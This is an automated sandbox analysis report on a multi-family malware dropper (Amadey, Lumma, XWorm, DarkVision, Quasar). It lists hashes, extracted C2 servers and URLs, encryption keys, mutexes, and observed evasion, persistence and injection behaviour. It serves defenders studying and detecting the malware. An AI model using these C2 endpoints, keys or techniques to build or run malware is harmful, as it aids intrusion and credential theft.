amadey | 04276f6cc92da081cb3e4a1800f6e9b29bd4a491e349d564ca19126eafa2b0b3

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
06/04/2025, 05:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

6.2MB
MD5

055cafebde85d5599bdde2e005d87e7e
SHA1

d3cc9c91e6b59835b9b29bf692cae593602bc6ed
SHA256

04276f6cc92da081cb3e4a1800f6e9b29bd4a491e349d564ca19126eafa2b0b3
SHA512

3d5b4c231248c137ab9ec68b32f1d230d735ba44eb9b9292f15d6ae6c624e49d839e861b1cc806effd90310895231bc1e68a66c06d4e0b55d86fe1000d08ba1b
SSDEEP

196608:AtbtRsluacAgdNFlDJPZ9RXtA56YB4FB:AtbtRjnlVx9NWI3

Score

10^/10

amadey darkvision lumma quasar xworm 092155 office04 bootkit defense_evasion discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://yplantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://5pepperiop.digital/oage

https://plantainklj.run/opafg

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Extracted

Family

xworm

Version

5.0

127.0.0.1:9000

45.134.39.20:9000

Mutex

oV8zKY7m1pKloRzQ

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

darkvision

82.29.67.160

Attributes

url
http://107.174.192.179/data/003

https://grabify.link/ZATFQO

http://107.174.192.179/clean
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1384-71-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/10316-24559-0x000000000D000000-0x000000000D154000-memory.dmp	family_quasar
behavioral1/memory/10316-24560-0x000000000D180000-0x000000000D19A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 3084 created 3376	3084	wQI4o11.exe	55
PID 3504 created 3376	3504	wQI4o11.exe	55
PID 10232 created 3376	10232	RegAsm.exe	55

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2q8021.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0cdf30e2d9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebe0a88a02.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1o70A8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4c7bc1193a.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
111	10316	powershell.exe
133	10316	powershell.exe
158	10316	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5448	powershell.exe
5744	powershell.exe
10316	powershell.exe
9364	powershell.exe

Downloads MZ/PE file 19 IoCs

flow	pid	Process
63	720	futors.exe
30	4692	rapes.exe
62	4692	rapes.exe
62	4692	rapes.exe
62	4692	rapes.exe
128	13028	svchost015.exe
46	4692	rapes.exe
92	720	futors.exe
64	5124	svchost.exe
103	4692	rapes.exe
103	4692	rapes.exe
103	4692	rapes.exe
103	4692	rapes.exe
103	4692	rapes.exe
103	4692	rapes.exe
103	4692	rapes.exe
103	4692	rapes.exe
134	13220	svchost015.exe
137	8644	svchost015.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0cdf30e2d9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebe0a88a02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0cdf30e2d9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebe0a88a02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1o70A8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2q8021.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4c7bc1193a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4c7bc1193a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1o70A8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2q8021.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	1o70A8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	larBxd7.exe

Deletes itself 1 IoCs

pid	Process
3580	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e012f00.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e012f00.cmd	powershell.exe

Executes dropped EXE 37 IoCs

pid	Process
4188	O7J17.exe
4420	1o70A8.exe
4692	rapes.exe
916	2q8021.exe
3700	VrQSuEQ.exe
3368	rapes.exe
3084	wQI4o11.exe
3504	wQI4o11.exe
1480	VrQSuEQ.exe
2316	amnew.exe
720	futors.exe
4660	UZPt0hR.exe
4344	4c7bc1193a.exe
3016	0cdf30e2d9.exe
4280	tzutil.exe
3580	w32tm.exe
13028	svchost015.exe
13184	fa6aed6b7e.exe
13220	svchost015.exe
13308	e84ac55482.exe
4364	RYZusWg.exe
2372	rapes.exe
8268	futors.exe
8644	svchost015.exe
10968	n0hEgR9.exe
12536	Rm3cVPI.exe
6684	IsValueCreated.exe
6992	mTk60rz.exe
9196	ZSoeRVBe.exe
2140	ebe0a88a02.exe
9700	LJl8AAr.exe
8068	TbV75ZR.exe
2152	rapes.exe
8004	futors.exe
6512	larBxd7.exe
10484	9sWdA2p.exe
11004	Jordan.com

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	4c7bc1193a.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	0cdf30e2d9.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	ebe0a88a02.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	1o70A8.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	2q8021.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe

Loads dropped DLL 47 IoCs

pid	Process
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe
9196	ZSoeRVBe.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	O7J17.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0cdf30e2d9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10052940101\\0cdf30e2d9.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e84ac55482.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10052950101\\e84ac55482.exe"	futors.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	4c7bc1193a.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1488	tasklist.exe
10000	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
4420	1o70A8.exe
4692	rapes.exe
916	2q8021.exe
3368	rapes.exe
4344	4c7bc1193a.exe
3016	0cdf30e2d9.exe
2372	rapes.exe
2140	ebe0a88a02.exe
2152	rapes.exe

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 3700 set thread context of 2240	3700	VrQSuEQ.exe	106
PID 3084 set thread context of 1384	3084	wQI4o11.exe	112
PID 3504 set thread context of 4076	3504	wQI4o11.exe	115
PID 1480 set thread context of 5540	1480	VrQSuEQ.exe	117
PID 3016 set thread context of 13028	3016	0cdf30e2d9.exe	141
PID 13184 set thread context of 13220	13184	fa6aed6b7e.exe	143
PID 13308 set thread context of 8644	13308	e84ac55482.exe	149
PID 10968 set thread context of 11220	10968	n0hEgR9.exe	161
PID 6684 set thread context of 10232	6684	IsValueCreated.exe	164
PID 10232 set thread context of 13208	10232	RegAsm.exe	171
PID 9700 set thread context of 9856	9700	LJl8AAr.exe	176
PID 8068 set thread context of 8168	8068	TbV75ZR.exe	178

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	1o70A8.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jordan.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fa6aed6b7e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1o70A8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0cdf30e2d9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebe0a88a02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2q8021.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4c7bc1193a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e84ac55482.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wQI4o11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	O7J17.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wQI4o11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000_Classes\Local Settings	rapes.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
10316	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4420	1o70A8.exe
4420	1o70A8.exe
4692	rapes.exe
4692	rapes.exe
916	2q8021.exe
916	2q8021.exe
916	2q8021.exe
916	2q8021.exe
916	2q8021.exe
916	2q8021.exe
2240	MSBuild.exe
2240	MSBuild.exe
2240	MSBuild.exe
2240	MSBuild.exe
3368	rapes.exe
3368	rapes.exe
3084	wQI4o11.exe
3084	wQI4o11.exe
3504	wQI4o11.exe
3504	wQI4o11.exe
5540	MSBuild.exe
5540	MSBuild.exe
5540	MSBuild.exe
5540	MSBuild.exe
5744	powershell.exe
5744	powershell.exe
5744	powershell.exe
4344	4c7bc1193a.exe
4344	4c7bc1193a.exe
3016	0cdf30e2d9.exe
3016	0cdf30e2d9.exe
2372	rapes.exe
2372	rapes.exe
10316	powershell.exe
10316	powershell.exe
10316	powershell.exe
5448	powershell.exe
5448	powershell.exe
5448	powershell.exe
11220	MSBuild.exe
11220	MSBuild.exe
11220	MSBuild.exe
11220	MSBuild.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
9364	powershell.exe
9364	powershell.exe
9364	powershell.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
10232	RegAsm.exe
2140	ebe0a88a02.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4660	UZPt0hR.exe
4660	UZPt0hR.exe
4660	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	1384	RegAsm.exe
Token: SeDebugPrivilege	4076	RegAsm.exe
Token: SeDebugPrivilege	5744	powershell.exe
Token: SeDebugPrivilege	4364	RYZusWg.exe
Token: SeDebugPrivilege	10316	powershell.exe
Token: SeDebugPrivilege	5448	powershell.exe
Token: SeDebugPrivilege	6684	IsValueCreated.exe
Token: SeDebugPrivilege	10232	RegAsm.exe
Token: SeDebugPrivilege	9196	ZSoeRVBe.exe
Token: SeDebugPrivilege	9364	powershell.exe
Token: SeLockMemoryPrivilege	13208	AddInProcess.exe
Token: SeLockMemoryPrivilege	13208	AddInProcess.exe
Token: SeDebugPrivilege	1488	tasklist.exe
Token: SeDebugPrivilege	10000	tasklist.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
13208	AddInProcess.exe
11004	Jordan.com
11004	Jordan.com
11004	Jordan.com

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
11004	Jordan.com
11004	Jordan.com
11004	Jordan.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1676 wrote to memory of 4188	1676	random.exe	88
PID 1676 wrote to memory of 4188	1676	random.exe	88
PID 1676 wrote to memory of 4188	1676	random.exe	88
PID 5844 wrote to memory of 3248	5844	cmd.exe	89
PID 5844 wrote to memory of 3248	5844	cmd.exe	89
PID 4188 wrote to memory of 4420	4188	O7J17.exe	92
PID 4188 wrote to memory of 4420	4188	O7J17.exe	92
PID 4188 wrote to memory of 4420	4188	O7J17.exe	92
PID 5116 wrote to memory of 1316	5116	cmd.exe	93
PID 5116 wrote to memory of 1316	5116	cmd.exe	93
PID 4420 wrote to memory of 4692	4420	1o70A8.exe	97
PID 4420 wrote to memory of 4692	4420	1o70A8.exe	97
PID 4420 wrote to memory of 4692	4420	1o70A8.exe	97
PID 4188 wrote to memory of 916	4188	O7J17.exe	98
PID 4188 wrote to memory of 916	4188	O7J17.exe	98
PID 4188 wrote to memory of 916	4188	O7J17.exe	98
PID 4692 wrote to memory of 3700	4692	rapes.exe	105
PID 4692 wrote to memory of 3700	4692	rapes.exe	105
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 3700 wrote to memory of 2240	3700	VrQSuEQ.exe	106
PID 4692 wrote to memory of 3084	4692	rapes.exe	110
PID 4692 wrote to memory of 3084	4692	rapes.exe	110
PID 4692 wrote to memory of 3084	4692	rapes.exe	110
PID 3084 wrote to memory of 1384	3084	wQI4o11.exe	112
PID 3084 wrote to memory of 1384	3084	wQI4o11.exe	112
PID 3084 wrote to memory of 1384	3084	wQI4o11.exe	112
PID 3084 wrote to memory of 1384	3084	wQI4o11.exe	112
PID 3084 wrote to memory of 1384	3084	wQI4o11.exe	112
PID 3084 wrote to memory of 1384	3084	wQI4o11.exe	112
PID 3084 wrote to memory of 1384	3084	wQI4o11.exe	112
PID 3084 wrote to memory of 1384	3084	wQI4o11.exe	112
PID 4692 wrote to memory of 3504	4692	rapes.exe	113
PID 4692 wrote to memory of 3504	4692	rapes.exe	113
PID 4692 wrote to memory of 3504	4692	rapes.exe	113
PID 3504 wrote to memory of 4076	3504	wQI4o11.exe	115
PID 3504 wrote to memory of 4076	3504	wQI4o11.exe	115
PID 3504 wrote to memory of 4076	3504	wQI4o11.exe	115
PID 3504 wrote to memory of 4076	3504	wQI4o11.exe	115
PID 3504 wrote to memory of 4076	3504	wQI4o11.exe	115
PID 3504 wrote to memory of 4076	3504	wQI4o11.exe	115
PID 3504 wrote to memory of 4076	3504	wQI4o11.exe	115
PID 3504 wrote to memory of 4076	3504	wQI4o11.exe	115
PID 4692 wrote to memory of 1480	4692	rapes.exe	116
PID 4692 wrote to memory of 1480	4692	rapes.exe	116
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 1480 wrote to memory of 5540	1480	VrQSuEQ.exe	117
PID 4692 wrote to memory of 2316	4692	rapes.exe	119
PID 4692 wrote to memory of 2316	4692	rapes.exe	119
PID 4692 wrote to memory of 2316	4692	rapes.exe	119
PID 2316 wrote to memory of 720	2316	amnew.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3376
- C:\Users\Admin\AppData\Local\Temp\random.exe
  "C:\Users\Admin\AppData\Local\Temp\random.exe"
  2⤵
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1676
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\O7J17.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\O7J17.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4188
